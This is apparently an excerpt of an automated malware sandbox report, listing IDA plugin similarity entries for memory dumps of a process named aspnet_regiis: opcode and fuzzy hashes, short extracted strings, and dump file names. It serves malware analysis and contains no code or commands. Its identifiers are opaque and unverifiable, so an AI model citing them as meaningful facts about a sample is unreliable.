                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: N&
                                                                                                                                                                                                                                              • API String ID: 0-3274356042
                                                                                                                                                                                                                                              • Opcode ID: 36f160253196b3ca1dd148c62a1cfc8461064bda4e4c02762ae8465a823f85d7
                                                                                                                                                                                                                                              • Instruction ID: c05aa221c474b3b78d1e0ac31f48ace0c1bc1f2e9e1cc651d59ef04c192be88f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36f160253196b3ca1dd148c62a1cfc8461064bda4e4c02762ae8465a823f85d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E510865615B804AD72ACB3A88503B37BD3BF9B310F5C969DC4D7DBA86CB3CA4028711
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 239369c15a29312b9dfce83f2301206609d554b5471593942d5046e4e6660124
                                                                                                                                                                                                                                              • Instruction ID: 45ad7076508d74bfaaa65fb709346c7e547c37a7f9b50567a7b9dd0f5c053887
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239369c15a29312b9dfce83f2301206609d554b5471593942d5046e4e6660124
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2441F2B1A043109BD718CF64CC5AB7BBBA1FFD5354F58891CE9865B3A0E3799904CB82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0$z
                                                                                                                                                                                                                                              • API String ID: 0-542936926
                                                                                                                                                                                                                                              • Opcode ID: a78d8198a38ae6d26257e135c29af1211d533347ca17a1d88347c95eb8633fc0
                                                                                                                                                                                                                                              • Instruction ID: f8d08b195e962f5003653749bfbdb56903d7c8e32f073079483cb4366ae0164f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a78d8198a38ae6d26257e135c29af1211d533347ca17a1d88347c95eb8633fc0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C3105B2A193118FD315DF24C88475BBBD6EB95710F09C92CE884A7242D3B9EC498BD6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: _^]\
                                                                                                                                                                                                                                              • API String ID: 0-3116432788
                                                                                                                                                                                                                                              • Opcode ID: 1d64538999d9c661751f378bdc33754984d48e45b214c5cd88274661352888fe
                                                                                                                                                                                                                                              • Instruction ID: 4efcff26ee4a2d3f3924fcb624d18f9909decc5b86a5454255e14d2f52867a36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d64538999d9c661751f378bdc33754984d48e45b214c5cd88274661352888fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701ADB0A0931187D7488B14D59052FB7A2BBC9310F299A2DD09223755C778A8428BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cac223725cf17c1bdee1668e7f75b717033cf7796b666e6da13471e137acbca8
                                                                                                                                                                                                                                              • Instruction ID: c1a5b9fc229285e22750762eb3fbbea8949982773a0610f03df707304ae2aa37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cac223725cf17c1bdee1668e7f75b717033cf7796b666e6da13471e137acbca8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E105B1A00219CFDB24CF69C8517BABBB1FF49310F18865DE496AB751E338AD11CB94
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e7c0f45ab84512ae7fb2d8cb6f8bc9bb240f4fd011a8e24e71803b582f72a183
                                                                                                                                                                                                                                              • Instruction ID: d36c932e918184f4136ec2cc9585e60053786fe3244d923e96057f3bc625975b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7c0f45ab84512ae7fb2d8cb6f8bc9bb240f4fd011a8e24e71803b582f72a183
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E1F7B1A00219CFDB24CF69C8517BAB7B1FF49310F14865DE496AB751E338AD11CB94
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: InitVariant
• String ID: A$B$B$D$K$M$j$q$w$y
• API String ID: 1927566239-3160828158